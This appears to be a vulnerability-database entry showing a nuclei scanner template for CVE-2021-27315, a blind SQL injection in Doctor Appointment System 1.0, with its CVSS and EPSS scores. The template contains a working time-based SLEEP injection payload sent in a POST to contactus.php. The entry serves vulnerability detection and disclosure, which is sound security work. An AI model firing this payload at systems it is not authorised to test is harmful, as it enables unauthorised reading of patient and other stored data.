Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-27315
HistoryMay 06, 2023 - 12:12 p.m.

Doctor Appointment System 1.0 - SQL Injection

2023-05-0612:12:20
ProjectDiscovery
github.com
3
cve2021
sqli
doctor-appointment-system
packetstorm
doctor_appointment_system_project

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.083 Low

EPSS

Percentile

94.4%

Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter.
id: CVE-2021-27315

info:
  name: Doctor Appointment System 1.0 - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
    - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27315
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-27315
    cwe-id: CWE-89
    epss-score: 0.07849
    epss-percentile: 0.94222
    cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: doctor_appointment_system_project
    product: doctor_appointment_system
  tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project

http:
  - raw:
      - |
        @timeout: 10s
        POST /contactus.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        firstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 500'
          - 'contains(body, "Medical Management System")'
        condition: and
# digest: 4a0a004730450220608993eb6c162f41af6eca78ee5e37966f90692f167c67e2f39623c90a6af11d022100bab80bd88b7acfd20895fdd9f38e249825760da11586f3cb851af29d59def924:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.083 Low

EPSS

Percentile

94.4%